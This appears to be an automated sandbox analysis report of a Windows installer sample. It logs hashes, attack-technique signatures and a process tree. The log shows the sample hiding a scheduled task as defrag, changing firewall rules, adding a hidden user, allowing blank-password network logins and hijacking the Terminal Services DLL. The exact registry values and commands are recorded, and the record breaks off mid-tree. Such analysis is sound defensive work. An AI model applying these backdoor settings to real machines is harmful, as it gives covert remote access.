Overview
overview
10Static
static
3a9f05c13d7...18.exe
windows7-x64
10a9f05c13d7...18.exe
windows10-2004-x64
10$PLUGINSDI...st.dll
windows7-x64
3$PLUGINSDI...st.dll
windows10-2004-x64
3$PLUGINSDI...em.dll
windows7-x64
3$PLUGINSDI...em.dll
windows10-2004-x64
3$PLUGINSDI...ec.dll
windows7-x64
3$PLUGINSDI...ec.dll
windows10-2004-x64
3$PLUGINSDI...ss.dll
windows7-x64
3$PLUGINSDI...ss.dll
windows10-2004-x64
3$PLUGINSDI...ry.dll
windows7-x64
3$PLUGINSDI...ry.dll
windows10-2004-x64
3$TEMP/RDP_5166.exe
windows7-x64
9$TEMP/RDP_5166.exe
windows10-2004-x64
9$PLUGINSDI...em.dll
windows7-x64
3$PLUGINSDI...em.dll
windows10-2004-x64
3$PLUGINSDI...ec.dll
windows7-x64
3$PLUGINSDI...ec.dll
windows10-2004-x64
3$TEMP/SETUP_73538.exe
windows7-x64
3$TEMP/SETUP_73538.exe
windows10-2004-x64
3$_1_/abashed.exe
windows7-x64
10$_1_/abashed.exe
windows10-2004-x64
10$_1_/libeay32.dll
windows7-x64
3$_1_/libeay32.dll
windows10-2004-x64
3$_1_/ssleay32.dll
windows7-x64
3$_1_/ssleay32.dll
windows10-2004-x64
3Analysis
-
max time kernel
142s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
19-08-2024 06:25
Static task
static1
Behavioral task
behavioral1
Sample
a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe
Resource
win10v2004-20240802-en
Behavioral task
behavioral3
Sample
$PLUGINSDIR/NSISList.dll
Resource
win7-20240705-en
Behavioral task
behavioral4
Sample
$PLUGINSDIR/NSISList.dll
Resource
win10v2004-20240802-en
Behavioral task
behavioral5
Sample
$PLUGINSDIR/System.dll
Resource
win7-20240704-en
Behavioral task
behavioral6
Sample
$PLUGINSDIR/System.dll
Resource
win10v2004-20240802-en
Behavioral task
behavioral7
Sample
$PLUGINSDIR/nsExec.dll
Resource
win7-20240704-en
Behavioral task
behavioral8
Sample
$PLUGINSDIR/nsExec.dll
Resource
win10v2004-20240802-en
Behavioral task
behavioral9
Sample
$PLUGINSDIR/nsProcess.dll
Resource
win7-20240705-en
Behavioral task
behavioral10
Sample
$PLUGINSDIR/nsProcess.dll
Resource
win10v2004-20240802-en
Behavioral task
behavioral11
Sample
$PLUGINSDIR/registry.dll
Resource
win7-20240708-en
Behavioral task
behavioral12
Sample
$PLUGINSDIR/registry.dll
Resource
win10v2004-20240802-en
Behavioral task
behavioral13
Sample
$TEMP/RDP_5166.exe
Resource
win7-20240708-en
Behavioral task
behavioral14
Sample
$TEMP/RDP_5166.exe
Resource
win10v2004-20240802-en
Behavioral task
behavioral15
Sample
$PLUGINSDIR/System.dll
Resource
win7-20240705-en
Behavioral task
behavioral16
Sample
$PLUGINSDIR/System.dll
Resource
win10v2004-20240802-en
Behavioral task
behavioral17
Sample
$PLUGINSDIR/nsExec.dll
Resource
win7-20240704-en
Behavioral task
behavioral18
Sample
$PLUGINSDIR/nsExec.dll
Resource
win10v2004-20240802-en
Behavioral task
behavioral19
Sample
$TEMP/SETUP_73538.exe
Resource
win7-20240704-en
Behavioral task
behavioral20
Sample
$TEMP/SETUP_73538.exe
Resource
win10v2004-20240802-en
Behavioral task
behavioral21
Sample
$_1_/abashed.exe
Resource
win7-20240705-en
Behavioral task
behavioral22
Sample
$_1_/abashed.exe
Resource
win10v2004-20240802-en
Behavioral task
behavioral23
Sample
$_1_/libeay32.dll
Resource
win7-20240704-en
Behavioral task
behavioral24
Sample
$_1_/libeay32.dll
Resource
win10v2004-20240802-en
Behavioral task
behavioral25
Sample
$_1_/ssleay32.dll
Resource
win7-20240704-en
Behavioral task
behavioral26
Sample
$_1_/ssleay32.dll
Resource
win10v2004-20240802-en
General
-
Target
a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe
-
Size
4.7MB
-
MD5
a9f05c13d758f4f34386042d85847bab
-
SHA1
d2af2b04fee943433395cd307ac6f9f405505071
-
SHA256
5312214b15330113f6eab71565e1e3c7d1ee3b59daa6703c271aaf3b192e6809
-
SHA512
1fb0a82895f95120a7648ff695af32249c38397a4444f8f32b8d3b347b6c40a2d01006a3dfb37f9f54132379150d8b3055ce38a0412a571e1d05b2467e4676b1
-
SSDEEP
98304:6I3IDNhT/Shhfm7D0PzBnC9W7oe2UfCqEdEwZnDbje8BziWU:6saOhFTD7oeJfnqPnDbjL2
Malware Config
Signatures
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Remote Service Session Hijacking: RDP Hijacking 1 TTPs 3 IoCs
Adversaries may hijack a legitimate user's remote desktop session to move laterally within an environment.
Processes:
cmd.exenet.exenet1.exepid process 5356 cmd.exe 5284 net.exe 5252 net1.exe -
Modifies Windows Firewall 2 TTPs 3 IoCs
Processes:
netsh.exenetsh.exenetsh.exepid process 5500 netsh.exe 5924 netsh.exe 5708 netsh.exe -
Server Software Component: Terminal Services DLL 1 TTPs 1 IoCs
Processes:
SETUP_73538.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll = "%ProgramFiles%\\Icosahedron\\disavow.dll" SETUP_73538.exe -
Allows Network login with blank passwords 1 TTPs 1 IoCs
Allows local user accounts with blank passwords to access device from the network.
Processes:
RDP_5166.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\LimitBlankPasswordUse = "0" RDP_5166.exe -
Checks computer location settings 2 TTPs 4 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exeabashed.exeabashed.exeRDP_5166.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe Key value queried \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation abashed.exe Key value queried \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation abashed.exe Key value queried \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation RDP_5166.exe -
Executes dropped EXE 5 IoCs
Processes:
abashed.exeabashed.exeabashed.exeRDP_5166.exeSETUP_73538.exepid process 4632 abashed.exe 3124 abashed.exe 2696 abashed.exe 4844 RDP_5166.exe 5140 SETUP_73538.exe -
Loads dropped DLL 64 IoCs
Processes:
a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exeabashed.exepid process 2880 a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe 2880 a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe 2880 a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe 2880 a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe 2880 a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe 2880 a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe 2880 a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe 2880 a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe 2880 a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe 2880 a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe 2880 a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe 2880 a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe 2880 a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe 2880 a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe 2880 a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe 2880 a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe 2880 a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe 2880 a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe 2880 a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe 2880 a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe 2880 a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe 2880 a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe 2880 a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe 2880 a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe 2880 a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe 2880 a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe 2880 a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe 2880 a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe 2880 a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe 2880 a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe 2880 a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe 2880 a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe 2880 a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe 2880 a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe 2880 a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe 2880 a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe 2880 a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe 2880 a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe 4632 abashed.exe 4632 abashed.exe 2880 a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe 2880 a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe 2880 a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe 2880 a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe 2880 a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe 2880 a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe 2880 a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe 2880 a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe 2880 a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe 2880 a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe 2880 a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe 2880 a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe 2880 a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe 2880 a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe 2880 a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe 2880 a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe 2880 a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe 2880 a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe 2880 a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe 2880 a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe 2880 a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe 2880 a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe 2880 a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe 2880 a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe -
Modifies WinLogon 2 TTPs 4 IoCs
Processes:
SETUP_73538.exeRDP_5166.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1" SETUP_73538.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList RDP_5166.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts RDP_5166.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\wgautilacc = "0" RDP_5166.exe -
Drops file in System32 directory 1 IoCs
Processes:
SETUP_73538.exedescription ioc process File created C:\Windows\System32\rfxvmt.dll SETUP_73538.exe -
Hide Artifacts: Hidden Users 1 TTPs 1 IoCs
Processes:
RDP_5166.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\wgautilacc = "0" RDP_5166.exe -
Drops file in Program Files directory 5 IoCs
Processes:
a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exeSETUP_73538.exedescription ioc process File created C:\Program Files\Defragmentation\abashed.exe a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe File created C:\Program Files\Defragmentation\ssleay32.dll a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe File created C:\Program Files\Defragmentation\libeay32.dll a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe File created C:\Program Files\Icosahedron\disavow.ini SETUP_73538.exe File created C:\Program Files\Icosahedron\disavow.dll SETUP_73538.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 9 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
Processes:
netsh.exenetsh.exenetsh.exedescription ioc process Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe -
Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
-
System Location Discovery: System Language Discovery 1 TTPs 22 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
abashed.exeabashed.exenetsh.execmd.exenet1.exeRDP_5166.exeSETUP_73538.execmd.exenetsh.execmd.execmd.exenet.exea9f05c13d758f4f34386042d85847bab_JaffaCakes118.exeschtasks.exeschtasks.exeschtasks.exenet.exenet1.execmd.exeabashed.exenet.exenet1.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language abashed.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language abashed.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RDP_5166.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SETUP_73538.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language abashed.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe -
NSIS installer 2 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\RDP_5166.exe nsis_installer_1 C:\Users\Admin\AppData\Local\Temp\RDP_5166.exe nsis_installer_2 -
Runs net.exe
-
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exepid process 2880 a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe 2880 a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe 2880 a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe 2880 a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe 2880 a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe 2880 a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe 2880 a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe 2880 a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe 2880 a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe 2880 a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe 2880 a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe 2880 a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe 2880 a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe 2880 a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe 2880 a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe 2880 a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe 2880 a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe 2880 a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe 2880 a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe 2880 a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe 2880 a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe 2880 a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe 2880 a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe 2880 a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe 2880 a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe 2880 a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe 2880 a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe 2880 a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe 2880 a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe 2880 a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe 2880 a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe 2880 a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe 2880 a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe 2880 a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe 2880 a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe 2880 a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe 2880 a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe 2880 a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe 2880 a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe 2880 a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe 2880 a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe 2880 a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe 2880 a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe 2880 a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe 2880 a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe 2880 a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe 2880 a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe 2880 a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe 2880 a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe 2880 a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe 2880 a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe 2880 a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe 2880 a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe 2880 a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe 2880 a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe 2880 a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe 2880 a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe 2880 a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe 2880 a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe 2880 a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe 2880 a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe 2880 a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe 2880 a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe 2880 a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe -
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
pid process 656 -
Suspicious use of AdjustPrivilegeToken 6 IoCs
Processes:
abashed.exeabashed.exeSETUP_73538.exesvchost.exedescription pid process Token: SeDebugPrivilege 4632 abashed.exe Token: SeTakeOwnershipPrivilege 3124 abashed.exe Token: SeTcbPrivilege 3124 abashed.exe Token: SeTcbPrivilege 3124 abashed.exe Token: SeDebugPrivilege 5140 SETUP_73538.exe Token: SeAuditPrivilege 5668 svchost.exe -
Suspicious use of SetWindowsHookEx 12 IoCs
Processes:
abashed.exeabashed.exeabashed.exepid process 4632 abashed.exe 4632 abashed.exe 4632 abashed.exe 4632 abashed.exe 3124 abashed.exe 3124 abashed.exe 3124 abashed.exe 3124 abashed.exe 2696 abashed.exe 2696 abashed.exe 2696 abashed.exe 2696 abashed.exe -
Suspicious use of WriteProcessMemory 59 IoCs
Processes:
a9f05c13d758f4f34386042d85847bab_JaffaCakes118.execmd.exeRDP_5166.execmd.execmd.execmd.exenet.execmd.exenet.exenet.exeSETUP_73538.exedescription pid process target process PID 2880 wrote to memory of 4632 2880 a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe abashed.exe PID 2880 wrote to memory of 4632 2880 a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe abashed.exe PID 2880 wrote to memory of 4632 2880 a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe abashed.exe PID 2880 wrote to memory of 1880 2880 a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe cmd.exe PID 2880 wrote to memory of 1880 2880 a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe cmd.exe PID 2880 wrote to memory of 1880 2880 a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe cmd.exe PID 1880 wrote to memory of 4488 1880 cmd.exe schtasks.exe PID 1880 wrote to memory of 4488 1880 cmd.exe schtasks.exe PID 1880 wrote to memory of 4488 1880 cmd.exe schtasks.exe PID 1880 wrote to memory of 652 1880 cmd.exe schtasks.exe PID 1880 wrote to memory of 652 1880 cmd.exe schtasks.exe PID 1880 wrote to memory of 652 1880 cmd.exe schtasks.exe PID 1880 wrote to memory of 3136 1880 cmd.exe schtasks.exe PID 1880 wrote to memory of 3136 1880 cmd.exe schtasks.exe PID 1880 wrote to memory of 3136 1880 cmd.exe schtasks.exe PID 2880 wrote to memory of 4844 2880 a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe RDP_5166.exe PID 2880 wrote to memory of 4844 2880 a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe RDP_5166.exe PID 2880 wrote to memory of 4844 2880 a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe RDP_5166.exe PID 4844 wrote to memory of 5140 4844 RDP_5166.exe SETUP_73538.exe PID 4844 wrote to memory of 5140 4844 RDP_5166.exe SETUP_73538.exe PID 4844 wrote to memory of 5140 4844 RDP_5166.exe SETUP_73538.exe PID 4844 wrote to memory of 5164 4844 RDP_5166.exe cmd.exe PID 4844 wrote to memory of 5164 4844 RDP_5166.exe cmd.exe PID 4844 wrote to memory of 5164 4844 RDP_5166.exe cmd.exe PID 5164 wrote to memory of 5708 5164 cmd.exe netsh.exe PID 5164 wrote to memory of 5708 5164 cmd.exe netsh.exe PID 5164 wrote to memory of 5708 5164 cmd.exe netsh.exe PID 4844 wrote to memory of 5576 4844 RDP_5166.exe cmd.exe PID 4844 wrote to memory of 5576 4844 RDP_5166.exe cmd.exe PID 4844 wrote to memory of 5576 4844 RDP_5166.exe cmd.exe PID 5576 wrote to memory of 5500 5576 cmd.exe netsh.exe PID 5576 wrote to memory of 5500 5576 cmd.exe netsh.exe PID 5576 wrote to memory of 5500 5576 cmd.exe netsh.exe PID 4844 wrote to memory of 5460 4844 RDP_5166.exe cmd.exe PID 4844 wrote to memory of 5460 4844 RDP_5166.exe cmd.exe PID 4844 wrote to memory of 5460 4844 RDP_5166.exe cmd.exe PID 5460 wrote to memory of 5412 5460 cmd.exe net.exe PID 5460 wrote to memory of 5412 5460 cmd.exe net.exe PID 5460 wrote to memory of 5412 5460 cmd.exe net.exe PID 5412 wrote to memory of 5388 5412 net.exe net1.exe PID 5412 wrote to memory of 5388 5412 net.exe net1.exe PID 5412 wrote to memory of 5388 5412 net.exe net1.exe PID 4844 wrote to memory of 5356 4844 RDP_5166.exe cmd.exe PID 4844 wrote to memory of 5356 4844 RDP_5166.exe cmd.exe PID 4844 wrote to memory of 5356 4844 RDP_5166.exe cmd.exe PID 5356 wrote to memory of 5308 5356 cmd.exe net.exe PID 5356 wrote to memory of 5308 5356 cmd.exe net.exe PID 5356 wrote to memory of 5308 5356 cmd.exe net.exe PID 5308 wrote to memory of 5288 5308 net.exe net1.exe PID 5308 wrote to memory of 5288 5308 net.exe net1.exe PID 5308 wrote to memory of 5288 5308 net.exe net1.exe PID 5356 wrote to memory of 5284 5356 cmd.exe net.exe PID 5356 wrote to memory of 5284 5356 cmd.exe net.exe PID 5356 wrote to memory of 5284 5356 cmd.exe net.exe PID 5284 wrote to memory of 5252 5284 net.exe net1.exe PID 5284 wrote to memory of 5252 5284 net.exe net1.exe PID 5284 wrote to memory of 5252 5284 net.exe net1.exe PID 5140 wrote to memory of 5924 5140 SETUP_73538.exe netsh.exe PID 5140 wrote to memory of 5924 5140 SETUP_73538.exe netsh.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe"1⤵
- Checks computer location settings
- Loads dropped DLL
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2880 -
C:\Program Files\Defragmentation\abashed.exe"C:\Program Files\Defragmentation\abashed.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4632 -
C:\Program Files\Defragmentation\abashed.exe"C:\Program Files\Defragmentation\abashed.exe" -second3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:3124
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c SchTasks /create /f /XML %temp%\Log547.xml /TN \microsoft\windows\defrag\scheduleddefrag && schtasks /Change /TN \microsoft\windows\defrag\scheduleddefrag /ENABLE && schtasks /run /TN \microsoft\windows\defrag\scheduleddefrag2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1880 -
C:\Windows\SysWOW64\schtasks.exeSchTasks /create /f /XML C:\Users\Admin\AppData\Local\Temp\Log547.xml /TN \microsoft\windows\defrag\scheduleddefrag3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:4488
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Change /TN \microsoft\windows\defrag\scheduleddefrag /ENABLE3⤵
- System Location Discovery: System Language Discovery
PID:652
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /TN \microsoft\windows\defrag\scheduleddefrag3⤵
- System Location Discovery: System Language Discovery
PID:3136
-
-
-
C:\Users\Admin\AppData\Local\Temp\RDP_5166.exe"C:\Users\Admin\AppData\Local\Temp\RDP_5166.exe"2⤵
- Allows Network login with blank passwords
- Checks computer location settings
- Executes dropped EXE
- Modifies WinLogon
- Hide Artifacts: Hidden Users
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4844 -
C:\Users\Admin\AppData\Local\Temp\SETUP_73538.exe"C:\Users\Admin\AppData\Local\Temp\SETUP_73538.exe" -i3⤵
- Server Software Component: Terminal Services DLL
- Executes dropped EXE
- Modifies WinLogon
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
